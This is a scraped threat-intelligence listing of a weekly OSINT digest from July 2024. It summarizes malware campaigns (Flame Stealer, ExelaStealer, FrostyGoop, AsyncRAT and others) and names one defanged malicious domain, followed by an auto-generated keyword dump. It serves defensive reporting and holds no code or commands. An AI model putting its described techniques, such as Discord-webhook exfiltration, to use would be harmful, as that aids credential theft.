One Article Review
| Source |  RiskIQ |
|---|---|
| Identifiant | 8546560 |
| Date de publication | 2024-07-29 10:58:35 (vue: 2024-07-29 11:18:40) |
| Titre | Weekly OSINT Highlights, 29 July 2024 |
| Texte | ## Snapshot Key trends from last week\'s OSINT reporting include novel malware, such as Flame Stealer and FrostyGoop, the compromise of legitimate platforms like Discord and GitHub, and state-sponsored threat actors conducting espionage and destructive attacks. Notable threat actors, including Russian groups, Transparent Tribe, FIN7, and DPRK\'s Andariel, are targeting a wide range of sectors from defense and industrial control systems to financial institutions and research entities. These attacks exploit various vulnerabilities and employ advanced evasion techniques, leveraging both traditional methods and emerging technologies like AI-generated scripts and RDGAs, underscoring the evolving and persistent nature of the cyber threat landscape. ## Description 1. [Widespread Adoption of Flame Stealer](https://sip.security.microsoft.com/intel-explorer/articles/f610f18e): Cyfirma reports Flame Stealer\'s use in stealing Discord tokens and browser credentials. Distributed via Discord and Telegram, this malware targets various platforms, utilizing evasion techniques like DLL side-loading and data exfiltration through Discord webhooks. 2. [ExelaStealer Delivered via PowerShell](https://sip.security.microsoft.com/intel-explorer/articles/5b4a34b0): The SANS Technology Institute Internet Storm Center reported a threat involving ExelaStealer, downloaded from a Russian IP address using a PowerShell script. The script downloads two PE files: a self-extracting RAR archive communicating with "solararbx\[.\]online" and "service.exe," the ExelaStealer malware. The ExelaStealer, developed in Python, uses Discord for C2, conducting reconnaissance activities and gathering system and user details. Comments in Russian in the script and the origin of the IP address suggest a Russian origin. 3. [FrostyGoop Disrupts Heating in Ukraine](https://sip.security.microsoft.com/intel-explorer/articles/cf8f8199): Dragos identified FrostyGoop malware in a cyberattack disrupting heating in Lviv, Ukraine. Linked to Russian groups, the ICS-specific malware exploits vulnerabilities in industrial control systems and communicates using the Modbus TCP protocol. 4. [Rhysida Ransomware Attack on Private School](https://sip.security.microsoft.com/intel-explorer/articles/4cf89ad3): ThreatDown by Malwarebytes identified a Rhysida ransomware attack using a new variant of the Oyster backdoor. The attackers used SEO-poisoned search results to distribute malicious installers masquerading as legitimate software, deploying the Oyster backdoor. 5. [LLMs Used to Generate Malicious Code](https://sip.security.microsoft.com/intel-explorer/articles/96b66de0): Symantec highlights cyberattacks using Large Language Models (LLMs) to generate malware code. Phishing campaigns utilize LLM-generated PowerShell scripts to download payloads like Rhadamanthys and LokiBot, stressing the need for advanced detection against AI-facilitated attacks. 6. [Stargazers Ghost Network Distributes Malware](https://sip.security.microsoft.com/intel-explorer/articles/62a3aa28): Check Point Research uncovers a network of GitHub accounts distributing malware via phishing repositories. The Stargazer Goblin group\'s DaaS operation leverages over 3,000 accounts to spread malware such as Atlantida Stealer and RedLine, targeting both general users and other threat actors. 7. [Crimson RAT Targets Indian Election Results](https://sip.security.microsoft.com/intel-explorer/articles/dfae4887): K7 Labs identified Crimson RAT malware delivered through documents disguised as "Indian Election Results." Transparent Tribe APT, believed to be from Pakistan, targets Indian diplomatic and defense entities using macro-embedded documents to steal credentials. 8. [AsyncRAT Distributed via Weaponized eBooks](https://sip.security.microsoft.com/intel-explorer/articles/e84ee11d): ASEC discovered AsyncRAT malware distributed through weaponized eBooks. Hidden PowerShell scripts within these eBooks trigger the AsyncRAT payload, which uses obfuscation and anti-detection techniques to exfiltrate data. |
| Notes | ★★ |
| Envoyé | Oui |
| Condensat | ### **© 000 0063 2024 2024** 7014 about accounts actions activities activity actor actors additional address addresses adoption advanced aerospace against age agencies ahead algorithms all allows also alto analysis andariel android anti any applications apt apt28 archive are asec associated asyncrat atlantida attack attackers attacks automatic avoid backdoor backdoors basta believed black blizzard blog: both breach breachforums browser but bypass campaign campaigns can capable capturing center cert check cherryspy china code collaboration com/intel comments communicates communicating community compromise compromised computers conduct conducting confidential confirming content continued control copyright corporate credential credentials crimson crypto customer customers cve cyber cyberattack cyberattacks cybersecurity cyfirma daas daggerfly darkgate data date day deceive deceptive decrypting defender defense delivered delivering department deploy deployed deploying description destructive details detection developed diplomatic directs discord discovered discussed disguised disrupting disruption disrupts distribute distributed distributes distributing distribution dll dns documents domain domains download downloaded downloads dprk dragos dropclue ebooks edr election email emails embedded emerging employ employee employees employing enforcement enhancing enterprises entities environments: eset espionage europol evade evasion evasive evolving exe exelastealer exfiltrate exfiltration exploit exploited exploiting exploits explorer/articles/03fdc068 explorer/articles/078e5560 explorer/articles/2826e7d7 explorer/articles/285b82d9 explorer/articles/4a0a3903 explorer/articles/4cf89ad3 explorer/articles/5426181c explorer/articles/5b4a34b0 explorer/articles/5c4c6d60 explorer/articles/62a3aa28 explorer/articles/8498f04d explorer/articles/8c90758c explorer/articles/96b66de0 explorer/articles/cf8f8199 explorer/articles/d4d496b7 explorer/articles/dfae4887 explorer/articles/e84ee11d explorer/articles/ed40fbef explorer/articles/f610f18e explorer/articles/ff2603f2 exposes extracting facilitated fake file files: fin7 financial flame following found from frostygoop funding gang gathering genai general generate generated generation get ghost github globally glueegg goblin group groups handbook harmful has hatvibe healthcare heating hfs hidden highlighting highlights http https://aka https://security https://sip ics identified identify impersonates incident include including indian indicate indicating industrial infection infoblox information infostealers installation installers institute institution institutions intelbroker intelligence interact international internet involved involving its july key keylogging known labs landscape language large last latest law leading leaked learn legitimate leverages leveraging like linked llm llms loaders loading login lokibot lumma lviv macma macro malicious malware malwarebytes masquerades masquerading methods mgbot microsoft millions mitigate modbus models monetized more most ms/threatintelblog multimedia nature need network networks new ngo notable novel obfuscation online onyx operation operational operations organizations origin osint other out over oyster page pakistan palo panda parking part partnership payload payloads permission persistent personal phishing platforms point poisoned posing post powershell prevent previews private procurement profile: profiles/0146164ed5ffa131074fa7e985f779597d2522865baa088f25cd80c3bed8d726 profiles/03ced82eecb35bdb459c47b7821b9b055d1dfa00b56dc1b06f59583bad8833c0 profiles/2296d491ea381b532b24f2575f9418d4b6723c17b8a1f507d20c2140a75d16d6 profiles/33933578825488511c30b0728dd3c4f8b5ca20e41c285a56f796eb39f57531ad profiles/3e4a164ad64958b784649928499521808aea4d3565df70afc7c85eae69f74278 profiles/e9216610feb409dfb620b28e510f2ae2582439dfc7c7e265815ff1a776016776 prohibited protection protocol provide pups python qbot rabbit range ransomware rar rat rdgas recommended reconnaissance redline register registered registering related report reported reporting reports rep |
| Tags | Ransomware Data Breach Spam Malware Tool Vulnerability Threat Legislation Mobile Industrial Medical |
| Stories | APT 28 APT 36 |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.